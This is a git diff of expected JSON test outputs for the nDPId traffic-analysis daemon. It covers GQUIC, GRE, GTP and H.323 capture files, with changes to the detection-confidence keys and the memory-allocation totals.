~~ json string max len.......: 1424 chars diff --git a/test/results/gquic.pcap.out b/test/results/gquic.pcap.out index 3fce25de3..f1fda4c88 100644 --- a/test/results/gquic.pcap.out +++ b/test/results/gquic.pcap.out 
@@ -2,8 +2,8 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1591876186378} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02267{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591876186378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1591876186378,"pkt":"6PckTkFdoMWJ9P+XCABFAAVieo1AAIARvdoKLAUZ2DrVo+6pAbsFTko2w1EwNTAIAXaX8XoV5u8AAEU0NFnBgsF5hkBVQ9QcdhAQB7AX4STVuX+cZkTXcyq7Q06MKI3IMV7nn3XwVsYd8lSM2UQ2Mh\/Lz0P54TH133\/BjF8sKcZx48\/VepMyZjozNf6hUhocgBAvamo29IXHVqILxpkl4wjCzjbjeV119chifFcXxaTjllFkxsh3XmLG5348E\/qK2TLLnMy43JAHw6S2e1v2BO4WXkya\/bcrsjPnQYikRvTxH8li9ZflQ5PttsYcSUtQigVmzX+3zu6YljUMgwCKrGbUc4ym0tN37M5ly\/uhm21+A6fvtyySGNQfP7wJOsR1iWGsA6NR+V\/fmgbvfd72gKd0sTHFADbRPSKYDc0XDK\/X8vG8GXGEknHbOT7DGSzLKpHYvLrwIaFjsweHE6gkta44k2oP3lJ5y\/ohylLleMWOzrznvbvHmPDTo6fznFlCwcMwiT5bU7kKdr22dfJC4HZKXgrfdx\/kyr9W7YgF8ndv1gEMp60hGoa3HeIkNrwcimMUj8lo1MQMLSdfIURLgLYuYXeqNU9nrCpCTOHF8rljnTLtemFl5GKnW4QO+Vn8YQU0wC2WniPFD0JOSE\/9\/8uhjdFWVDMbiGWhYk1SCdcSCnwwatMyU\/DcpZqDI25eb58WZqvNqtnsCmojU\/8N4SjVKXFe6sqZF9Vu2GvgHDvSqxDzjeY9qlts4TuIbe+gH+w1MKU7JxNtGZ08YyKdDEVfiklQ\/xyvSgH5AGRqlnD6igJ7NF54pjKD67q+V\/b7AzUVhGIbpajDS4rvn+fDdhXSGqLFbtHNBw9zOlfyLlg3QCkztn+awCGkuUrUQJWRuzHeXcQ9Pm+GTWr4ztxdNe8GOdcH0fw\/02FqwqbZa0xgXb6ogDH\/Z7u3OTt5CsB\/hPp4imvHezect7LAbuRcIJ+tmXKeqwNdUGoyV614kYKA0aTDm4QbBmp4nIg9dspzjXHExZ33U9zxLwZ8DYwQJDoYhywocb4+jKp5OhFT0Egt5ANj4PPsKNBEjNDxnpAKCiI11YkYMyYj1BSFJ2mKW5kFXZ2\/Uk7W0jKMRykBFSaIJ+fwu1W4yhNjDR69KpOGwGw5d47DA9U+Gj7qbRCpjgb1v145AzbIQNTU\/mwU8gqij0o+rVb\/pUEtWMRho\/Yukqvj0PDpk20u\/iMNduvSEQAQLt7IA31zZMJsdzUDXqeH4lvAJTdAXDM+BfHOutfryXO0ilZKrrhbJmj03RyAieSkoI7y9TYI7udqZUukM2QcgXS180FYjb94yLuFlXG0La9U7oT6UzgYEOrDdq4bcoWorhw9j4EjTTcsFMkNO8f65TlicSD0KdGh7ggCR8NtD2qMSi4KIMxq9IHmGPWBJODrdc1+LXcmA3ApoiY81zbK2QPTdK0LHWSdeauC3LCzY9zJ5bEtZvA4hiamdfZl4E5cxC\/raRilWW9+sNuXDrAH9rw48q66KiLSEC63yDpS1q549REO+OCEIx8SKQQoN1W6tspnVZ3EKLwuCby00TS84gP7\/ke1UZsRS
UTrMeCETmkIya9DRfJn3gxYto584jg1Sk6Axi4aJ8MlnhdHfC\/0XWQrVM1UOD3\/J3K5XZUZKJ5vUWJzfBTgAe8J4\/heUMD2WmkBuQIER6hh9JGvwyZ2I6vJO7KXsorNCeXZA6iFfdtk90sqEl67LnWUAJmZ\/6NzgV\/JXrGoQRR0uqoWVC\/xj1u+c66MRH8y3Tf8DUoZ1L57SrRzGrkWBB6B2RSkfxWVzZUSCgEgPU4Lp+fnv6pDzh8zifmLUphU5Jycotx7"} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.gstatic.com","user_agent":"canary Chrome\/85.0.4169.0 Windows NT 10.0; Win64; x64"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.gstatic.com","user_agent":"canary Chrome\/85.0.4169.0 Windows NT 10.0; Win64; x64"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":1350,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1591876186378} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879843 bytes -~~ total memory freed........: 5879843 bytes -~~ total allocations/frees...: 118135/118135 +~~ total memory allocated....: 6013477 bytes +~~ total memory freed........: 6013477 bytes +~~ total allocations/frees...: 120897/120897 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 2272 chars diff --git a/test/results/gre_no_options.pcapng.out b/test/results/gre_no_options.pcapng.out index 99a3ed1f5..d275657c5 100644 --- a/test/results/gre_no_options.pcapng.out +++ b/test/results/gre_no_options.pcapng.out 
@@ -2,9 +2,9 @@ 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"gre_no_options.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1588346159187} 00551{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"gre_no_options.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588346159187,"flow_last_seen":1588346159187,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1588346159187,"l3_proto":"ip4","src_ip":"203.0.113.1","dst_ip":"192.0.2.2","l4_proto":47,"flow_datalink":1,"flow_max_packets":3} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"gre_no_options.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1588346159187,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1588346159187,"pkt":"qrvMAAQAqrvMAAEACABFAAB8AAUAAP8vvUnLAHEBwAACAgAACABFAABkAAAAAP8Bo5QKAQIBCgECAggAttoAAAAAAAAAAAACx22rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavN"} 
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"gre_no_options.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588346159187,"flow_last_seen":1588346159187,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1588346159187,"l3_proto":"ip4","src_ip":"203.0.113.1","dst_ip":"192.0.2.2","l4_proto":47,"ndpi": {"confidence": {"4":"DPI"},"proto":"GRE","breed":"Acceptable","category":"Network"}} +00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"gre_no_options.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588346159187,"flow_last_seen":1588346159187,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1588346159187,"l3_proto":"ip4","src_ip":"203.0.113.1","dst_ip":"192.0.2.2","l4_proto":47,"ndpi": {"confidence": {"6":"DPI"},"proto":"GRE","breed":"Acceptable","category":"Network"}} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"gre_no_options.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1588346159188,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1588346159188,"pkt":"qrvMAAEAqrvMAAQACABFAAB8AAUAAP4vvknAAAICywBxAQAACABFAABkAAAAAP8Bo5QKAQICCgECAQAAvtoAAAAAAAAAAAACx22rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavN"} 
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"gre_no_options.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588346159187,"flow_last_seen":1588346159188,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1588346159188,"l3_proto":"ip4","src_ip":"203.0.113.1","dst_ip":"192.0.2.2","l4_proto":47,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GRE","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"gre_no_options.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588346159187,"flow_last_seen":1588346159188,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1588346159188,"l3_proto":"ip4","src_ip":"203.0.113.1","dst_ip":"192.0.2.2","l4_proto":47,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GRE","breed":"Acceptable","category":"Network"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"gre_no_options.pcapng","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":208,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1588346159188} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 
@@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869501 bytes -~~ total memory freed........: 5869501 bytes -~~ total allocations/frees...: 118116/118116 +~~ total memory allocated....: 6003135 bytes +~~ total memory freed........: 6003135 bytes +~~ total allocations/frees...: 120878/120878 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 472 chars ~~ json string max len.......: 653 chars diff --git a/test/results/gtp_c.pcap.out b/test/results/gtp_c.pcap.out index b446bfcdf..bdb5e1c50 100644 --- a/test/results/gtp_c.pcap.out +++ b/test/results/gtp_c.pcap.out 
@@ -2,10 +2,10 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"gtp_c.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614767558813} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614767558813,"flow_last_seen":1614767558813,"flow_idle_time":200000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1614767558813,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":1024,"dst_port":2123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614767558813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1614767558813,"pkt":"5kBKB+riApXG95NLCABFAAETmxkAAIARAAAKZQACCmYAAgQACEsA\/wAASCAA8wAAAABLVGIAAQAIAIlnRREiM0T1TAAGAJh2VBI0VksACAA0VniQEgEC81YADQAYmHZUEjSYdlQSNFZ4UwADAIlHVlIAAQAGTQACAAAAVwAJAIY1UpIECmUAAkcACQAIaW50ZXJuZXSAAAEAAGMAAQABTwAFAAEhFxcBfwABAAJIAAgAAAAnDwAAJw9JAAEABV0APQBJAAEABVQADQAhMQEJEMCoAQH\/\/\/8AVwAJAoQ1UpIFCmUAAlAAFgAYBwAAAAAAAAAAAAAAAAAAAAAAAAAAhAAHAAGsEGtxAAGEAAcBAawQa3IAAXIAAgAAAF8AAgAAAQ=="} 
-00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614767558813,"flow_last_seen":1614767558813,"flow_idle_time":200000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1614767558813,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":1024,"dst_port":2123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_C","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614767558813,"flow_last_seen":1614767558813,"flow_idle_time":200000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1614767558813,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":1024,"dst_port":2123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"GTP.GTP_C","breed":"Acceptable","category":"Network"}} 
00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614767558814,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1614767558814,"pkt":"ApXG95NL5kBKB+riCABFAADwmxEAAH8Rix0KZgACCmUAAghLBAAA3AAASCEA0DVSkgRLVGIAAgACABAAVwAJAYc1UpIGCmYAAk8ABQABIRcXAX8AAQABSAAIAAAAJw8AACcPXQBsAEkAAQAFAgACABAAVAAuACIgABgQ3NwAAP\/\/AAAwhEEH0BOIUQfQE4hwAAAQAA8whEEH0BOIUQfQE4hwAABXAAkChTVSkgcKZgACUAAWABgHAAAAAAAAAAAAAAAAAAAAAAAAAABeAAQAEDqYBQMAAQABiAAXAG9mY3MubW5jNjU0Lm1jYzk4Ny5ncHJzhAAHAAGsEGt6AAE="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614767558814,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1614767558814,"pkt":"5kBKB+riApXG95NLCABFAAA+mxoAAIARAAAKZQACCmYAAgQACEsAKgAASCQAHjVSkgZLVGIASQABAAVWAA0AGJh2VBI0mHZUEjRWeA=="} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1614767558813,"flow_last_seen":1614767558815,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1614767558815,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":1024,"dst_port":2123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_C","breed":"Acceptable","category":"Network"}} 
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1614767558813,"flow_last_seen":1614767558815,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1614767558815,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":1024,"dst_port":2123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GTP.GTP_C","breed":"Acceptable","category":"Network"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"gtp_c.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":516,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1614767558815} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869559 bytes -~~ total memory freed........: 5869559 bytes -~~ total allocations/frees...: 118118/118118 +~~ total memory allocated....: 6003193 bytes +~~ total memory freed........: 6003193 bytes +~~ total allocations/frees...: 120880/120880 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 773 chars 
diff --git a/test/results/gtp_false_positive.pcapng.out b/test/results/gtp_false_positive.pcapng.out index a7fd443f4..cb6a53d70 100644 --- a/test/results/gtp_false_positive.pcapng.out +++ b/test/results/gtp_false_positive.pcapng.out @@ -25,9 +25,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871766 bytes -~~ total memory freed........: 5871766 bytes -~~ total allocations/frees...: 118129/118129 +~~ total memory allocated....: 6005400 bytes +~~ total memory freed........: 6005400 bytes +~~ total allocations/frees...: 120891/120891 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 891 chars diff --git a/test/results/gtp_prime.pcapng.out b/test/results/gtp_prime.pcapng.out index eb2d1e71f..c794360b2 100644 --- a/test/results/gtp_prime.pcapng.out +++ b/test/results/gtp_prime.pcapng.out @@ -11,9 +11,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 193 chars ~~ json string max len.......: 672 chars diff --git a/test/results/h323-overflow.pcap.out b/test/results/h323-overflow.pcap.out index f7363f353..d68dd5480 100644 --- a/test/results/h323-overflow.pcap.out +++ b/test/results/h323-overflow.pcap.out 
@@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871520 bytes -~~ total memory freed........: 5871520 bytes -~~ total allocations/frees...: 118116/118116 +~~ total memory allocated....: 6005154 bytes +~~ total memory freed........: 6005154 bytes +~~ total allocations/frees...: 120878/120878 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 654 chars diff --git a/test/results/h323.pcap.out b/test/results/h323.pcap.out index 57b0f1326..eb4008212 100644 --- a/test/results/h323.pcap.out +++ b/test/results/h323.pcap.out 
@@ -2,15 +2,15 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"h323.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1198747079978} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747079978,"flow_last_seen":1198747079978,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1198747079978,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1198747079978,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1198747079978,"pkt":"ABj+bZZlABMh8GpfCABFAABCx9cAAIART7MRAgB8EQIAoQfyBrcALv7LAiAAAAYACJFKAAQAEQIAfAfyIgCuAQA9AAEDAIXImlEggAMBQAA="} 
